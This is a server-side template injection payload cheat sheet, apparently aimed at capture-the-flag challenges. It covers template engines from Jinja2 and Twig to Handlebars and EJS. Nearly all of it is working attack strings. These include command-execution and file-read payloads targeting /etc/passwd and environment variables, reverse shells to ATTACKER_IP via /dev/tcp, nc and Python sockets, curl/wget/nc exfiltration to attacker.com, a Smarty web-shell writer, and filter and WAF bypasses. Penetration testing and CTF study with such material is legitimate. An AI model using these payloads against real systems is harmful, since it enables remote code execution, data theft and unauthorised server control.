=== DETECTION PAYLOADS ===
{{7*7}}
${7*7}
<%= 7*7 %>
#{7*7}
${{7*7}}
*{7*7}
@(7*7)
{{7*'7'}}

=== JINJA2 DETECTION ===
{{7*7}}
{{7*'7'}}
{{config}}
{{self}}
{{''.join(['a','b','c'])}}

=== TWIG DETECTION ===
{{7*7}}
{{7*'7'}}
{{_self}}
{{dump(app)}}

=== FREEMARKER DETECTION ===
${7*7}
#{7*7}

=== VELOCITY DETECTION ===
#set($x=7*7)$x

=== SMARTY DETECTION ===
{7*7}
{$smarty.version}

=== ERB DETECTION ===
<%= 7*7 %>
<%= "test".upcase %>

=== MAKO DETECTION ===
${7*7}
<%print(7*7)%>

=== JINJA2 RCE ===
# Using cycler
{{cycler.__init__.__globals__.os.popen('id').read()}}
{{cycler.__init__.__globals__.os.popen('whoami').read()}}
{{cycler.__init__.__globals__.os.popen('cat /etc/passwd').read()}}
{{cycler.__init__.__globals__.os.popen('cat /flag.txt').read()}}

# Using lipsum
{{lipsum.__globals__.os.popen('id').read()}}
{{lipsum.__globals__.os.popen('ls -la').read()}}
{{lipsum.__globals__.__builtins__.__import__('os').popen('id').read()}}

# Using joiner
{{joiner.__init__.__globals__.os.popen('id').read()}}

# Using namespace
{{namespace.__init__.__globals__.os.popen('id').read()}}

# Using config (Flask)
{{config.__class__.__init__.__globals__['os'].popen('id').read()}}

# Using request (Flask)
{{request.application.__globals__.__builtins__.__import__('os').popen('id').read()}}

# Using self
{{self.__init__.__globals__.__builtins__.__import__('os').popen('id').read()}}

# Using subclasses
{{''.__class__.__mro__[1].__subclasses__()[104].__init__.__globals__['sys'].modules['os'].popen('id').read()}}
{{[].__class__.__base__.__subclasses__()[104].__init__.__globals__['__builtins__']['__import__']('os').popen('id').read()}}

=== JINJA2 FILE READ ===
{{cycler.__init__.__globals__.__builtins__.open('/etc/passwd').read()}}
{{lipsum.__globals__.__builtins__.open('/etc/passwd').read()}}
{{''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read()}}
{{config.__class__.__init__.__globals__['os'].popen('cat /etc/passwd').read()}}

# Read flag
{{cycler.__init__.__globals__.__builtins__.open('/flag.txt').read()}}
{{lipsum.__globals__.os.popen('cat /flag.txt').read()}}

=== JINJA2 ENVIRONMENT VARIABLES ===
{{cycler.__init__.__globals__.os.environ}}
{{lipsum.__globals__.os.environ}}
{{config.__class__.__init__.__globals__['os'].environ}}

=== JINJA2 LIST DIRECTORY ===
{{cycler.__init__.__globals__.os.listdir('/')}}
{{lipsum.__globals__.os.popen('ls -la /').read()}}

=== JINJA2 REVERSE SHELL ===
{{cycler.__init__.__globals__.os.popen('bash -c "bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1"').read()}}
{{lipsum.__globals__.os.popen('nc ATTACKER_IP 4444 -e /bin/bash').read()}}
{{config.__class__.__init__.__globals__['os'].popen('python -c "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\'ATTACKER_IP\',4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call([\'/bin/bash\',\'-i\'])"').read()}}

=== JINJA2 FILTER BYPASS - NO QUOTES ===
{{cycler.__init__.__globals__.os.popen(request.args.cmd).read()}}
# Use: ?cmd=id

{{lipsum.__globals__[request.args.x].popen(request.args.cmd).read()}}
# Use: ?x=os&cmd=whoami

=== JINJA2 FILTER BYPASS - NO DOTS ===
{{''['__class__']}}
{{''['__class__']['__mro__']}}
{{''|attr('__class__')}}
{{''|attr('__class__')|attr('__mro__')}}
{{lipsum['__globals__']['os'].popen('id').read()}}

=== JINJA2 FILTER BYPASS - NO UNDERSCORES ===
{{''['\x5f\x5fclass\x5f\x5f']}}
{{''['\x5f\x5fclass\x5f\x5f']['\x5f\x5fmro\x5f\x5f']}}
{{lipsum['\x5f\x5fglobals\x5f\x5f'].os.popen('id').read()}}

=== JINJA2 FILTER BYPASS - NO {{}} ===
{% print(7*7) %}
{% print config %}
{%set x=7*7%}{{x}}
{%print(cycler.__init__.__globals__.os.popen('id').read())%}

=== JINJA2 BLIND SSTI (NO OUTPUT) ===
# Out-of-band exfiltration
{{lipsum.__globals__.os.popen('curl http://attacker.com/?data=$(cat /flag.txt)').read()}}
{{cycler.__init__.__globals__.os.popen('wget --post-file=/flag.txt http://attacker.com').read()}}
{{config.__class__.__init__.__globals__['os'].popen('nc attacker.com 4444 < /flag.txt').read()}}

=== TWIG RCE ===
{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}
{{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("whoami")}}
{{['id']|filter('system')}}
{{['cat /etc/passwd']|filter('system')}}
{{['cat /flag.txt']|filter('system')}}
{{['ls -la']|filter('system')}}
{{['whoami']|filter('passthru')}}
{{_self.env.registerUndefinedFilterCallback("shell_exec")}}{{_self.env.getFilter("cat /flag.txt")}}

=== TWIG FILE READ ===
{{['cat /etc/passwd']|filter('system')}}
{{['cat /flag.txt']|filter('system')}}
{{_self.env.registerUndefinedFilterCallback("file_get_contents")}}{{_self.env.getFilter("/etc/passwd")}}

=== FREEMARKER RCE ===
<#assign ex="freemarker.template.utility.Execute"?new()> ${ex("id")}
<#assign ex="freemarker.template.utility.Execute"?new()> ${ex("whoami")}
<#assign ex="freemarker.template.utility.Execute"?new()> ${ex("cat /etc/passwd")}
<#assign ex="freemarker.template.utility.Execute"?new()> ${ex("cat /flag.txt")}

# Alternative
${product.getClass().getProtectionDomain().getCodeSource().getLocation().toURI().resolve('/etc/passwd').toURL().openStream().readAllBytes()?join(" ")}

=== VELOCITY RCE ===
#set($runtime=$class.forName('java.lang.Runtime').getRuntime())
#set($process=$runtime.exec('id'))
$process.waitFor()
#set($null=$process.getInputStream())
#foreach($i in [1..$null.available()])
$null.read()
#end

# Alternative
#set($x='')##
#set($rt=$x.class.forName('java.lang.Runtime'))##
#set($chr=$x.class.forName('java.lang.Character'))##
#set($str=$x.class.forName('java.lang.String'))##
#set($ex=$rt.getRuntime().exec('id'))##
$ex.waitFor()
#set($out=$ex.getInputStream())##
#foreach($i in [1..$out.available()])
$str.valueOf($chr.toChars($out.read()))
#end

=== SMARTY RCE ===
{system('id')}
{system('cat /etc/passwd')}
{system('cat /flag.txt')}
{php}system('id');{/php}
{Smarty_Internal_Write_File::writeFile($SCRIPT_NAME,"<?php system($_GET['c']); ?>",self::clearConfig())}

=== ERB RCE ===
<%= system('id') %>
<%= `id` %>
<%= system('cat /etc/passwd') %>
<%= `cat /flag.txt` %>
<%= IO.popen('id').readlines() %>
<%= IO.popen('whoami').read %>

=== ERB FILE READ ===
<%= File.open('/etc/passwd').read %>
<%= File.open('/flag.txt').read %>
<%= File.read('/etc/passwd') %>

=== ERB ENVIRONMENT VARIABLES ===
<%= ENV %>
<%= ENV['PATH'] %>
<%= ENV['FLAG'] %>

=== MAKO RCE ===
${self.module.cache.util.os.system("id")}
${self.module.runtime.util.os.system("whoami")}
${self.module.cache.util.os.popen("cat /etc/passwd").read()}
<%import os%>${os.system('id')}

=== PUG/JADE RCE (Node.js) ===
#{function(){localLoad=global.process.mainModule.constructor._load;sh=localLoad("child_process").exec('id')}()}
#{function(){localLoad=global.process.mainModule.constructor._load;sh=localLoad("child_process").exec('cat /flag.txt')}()}

=== HANDLEBARS RCE (Node.js) ===
{{#with "s" as |string|}}
  {{#with "e"}}
    {{#with split as |conslist|}}
      {{this.pop}}
      {{this.push (lookup string.sub "constructor")}}
      {{this.pop}}
      {{#with string.split as |codelist|}}
        {{this.pop}}
        {{this.push "return require('child_process').exec('id');"}}
        {{this.pop}}
        {{#each conslist}}
          {{#with (string.sub.apply 0 codelist)}}
            {{this}}
          {{/with}}
        {{/each}}
      {{/with}}
    {{/with}}
  {{/with}}
{{/with}}

=== EJS RCE (Node.js) ===
<%= global.process.mainModule.require('child_process').execSync('id') %>
<%= global.process.mainModule.require('child_process').execSync('cat /flag.txt') %>

=== POLYGLOT PAYLOADS ===
${{<%[%'"}}%\
{{7*7}}${7*7}<%= 7*7 %>#{7*7}

=== CTF-SPECIFIC PATTERNS ===
# Read flag
{{cycler.__init__.__globals__.os.popen('cat /flag').read()}}
{{cycler.__init__.__globals__.os.popen('cat /flag.txt').read()}}
{{cycler.__init__.__globals__.os.popen('cat /app/flag.txt').read()}}
{{cycler.__init__.__globals__.os.popen('cat flag').read()}}
{{['cat /flag']|filter('system')}}

# List files
{{cycler.__init__.__globals__.os.popen('ls -la /').read()}}
{{cycler.__init__.__globals__.os.popen('find / -name flag*').read()}}
{{['ls -la']|filter('system')}}

# Check environment
{{cycler.__init__.__globals__.os.environ}}
{{config}}
<%= ENV %>

# One-liner with parameter
{{cycler.__init__.__globals__.os.popen(request.args.cmd).read()}}
# Use: ?cmd=cat /flag.txt

=== AUTOMATION PAYLOADS ===
# For finding useful subclasses in Jinja2
{{''.__class__.__mro__[1].__subclasses__()}}
{{[].__class__.__base__.__subclasses__()}}

# Enumerate all classes
{% for i in range(500) %}
{{i}} - {{''.__class__.__mro__[1].__subclasses__()[i]}}
{% endfor %}

=== BYPASS WAF ===
# Spaces
{{7*7}}
{{7/**/7}}

# Concatenation
{{"__cla"+"ss__"}}
{{"o"+"s"}}

# Using request.args
{{lipsum.__globals__[request.args.x]}}
# Use: ?x=os

# Encoding
{{''['\x5f\x5fclass\x5f\x5f']}}
{{''['\u005f\u005fclass\u005f\u005f']}}

# Using attr
{{''|attr('__class__')}}
{{lipsum|attr('__globals__')}}

=== TESTING CHECKLIST ===
# 1. Basic detection
{{7*7}}
${7*7}
<%= 7*7 %>

# 2. Identify engine
{{7*'7'}}
{{config}}
{{_self}}

# 3. Test for sandbox escape
{{lipsum.__globals__}}
{{cycler.__init__.__globals__}}

# 4. Check for os module
{{lipsum.__globals__.os}}
{{cycler.__init__.__globals__.os}}

# 5. Execute command
{{lipsum.__globals__.os.popen('id').read()}}

# 6. Read flag
{{lipsum.__globals__.os.popen('cat /flag.txt').read()}}